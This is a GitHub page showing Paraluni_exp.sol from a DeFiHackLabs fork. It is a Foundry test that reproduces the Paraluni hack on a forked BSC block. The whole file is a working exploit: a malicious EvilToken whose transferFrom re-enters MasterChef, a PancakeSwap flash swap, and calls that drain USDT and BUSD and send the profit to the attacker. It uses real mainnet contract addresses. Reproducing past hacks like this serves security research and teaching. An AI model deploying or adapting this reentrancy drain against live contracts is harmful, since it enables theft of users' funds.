forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Paraluni_exp.sol
113 lines (101 loc) · 3.63 KB
/
Paraluni_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./interface.sol";
contract EvilToken {
IMasterChef masterchef;
IERC20 usdt = IERC20(0x55d398326f99059fF775485246999027B3197955);
IERC20 busd = IERC20(0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56);
constructor(IMasterChef _masterchef) {
masterchef = _masterchef;
}
function allowance(address owner, address spender)
external
view
returns (uint256)
{
return 2**256 - 1;
}
function balanceOf(address account) external view returns (uint256) {
return 1111;
}
function transferFrom(
address from,
address to,
uint256 amount
) external returns (bool) {
if (
address(masterchef) != address(0) &&
address(msg.sender) != address(masterchef)
) {
usdt.approve(address(masterchef), 2**256 - 1);
busd.approve(address(masterchef), 2**256 - 1);
masterchef.depositByAddLiquidity(
18,
[address(usdt), address(busd)],
[usdt.balanceOf(address(this)), busd.balanceOf(address(this))]
);
}
return true;
}
function redeem() external {
(uint256 _amount, ) = masterchef.userInfo(18, address(this));
masterchef.withdrawAndRemoveLiquidity(18, _amount, false);
usdt.transfer(msg.sender, usdt.balanceOf(address(this)));
busd.transfer(msg.sender, busd.balanceOf(address(this)));
}
}
contract ContractTest is DSTest {
IPancakePair pair = IPancakePair(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00);
IERC20 usdt = IERC20(0x55d398326f99059fF775485246999027B3197955);
IERC20 busd = IERC20(0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56);
IMasterChef masterchef =
IMasterChef(0x633Fa755a83B015cCcDc451F82C57EA0Bd32b4B4);
EvilToken token0;
EvilToken token1;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("bsc", 16008280); //fork bsc at block 16008280
}
function testExploit() public {
token0 = new EvilToken(IMasterChef(address(0)));
token1 = new EvilToken(masterchef);
pair.swap(10000 * 1e18, 10000 * 1e18, address(this), new bytes(1));
emit log_named_uint(
"Before exploit, Dai balance of attacker:",
usdt.balanceOf(msg.sender)
);
emit log_named_uint(
"After exploit, Dai balance of attacker:",
busd.balanceOf(msg.sender)
);
//iWithdraw.processExits(0x6B175474E89094C44Da98b954EedeAC495271d0F);
// emit log_named_uint("After exploit, Dai balance of attacker:",idai.balanceOf(msg.sender));
}
function pancakeCall(
address sender,
uint256 amount0,
uint256 amount1,
bytes calldata data
) public {
usdt.transfer(address(token1), usdt.balanceOf(address(this)));
busd.transfer(address(token1), busd.balanceOf(address(this)));
masterchef.depositByAddLiquidity(
18,
[address(token0), address(token1)],
[uint256(1), uint256(1)]
);
(uint256 _amount, ) = masterchef.userInfo(18, address(this));
masterchef.withdrawAndRemoveLiquidity(18, _amount, false);
address[] memory t = new address[](2);
t[0] = address(busd);
t[1] = address(usdt);
masterchef.withdrawChange(t);
token1.redeem();
usdt.transfer(msg.sender, ((amount0 / 9975) * 10000) + 10000);
busd.transfer(msg.sender, ((amount1 / 9975) * 10000) + 10000);
usdt.transfer(tx.origin, usdt.balanceOf(address(this)));
busd.transfer(tx.origin, busd.balanceOf(address(this)));
}
}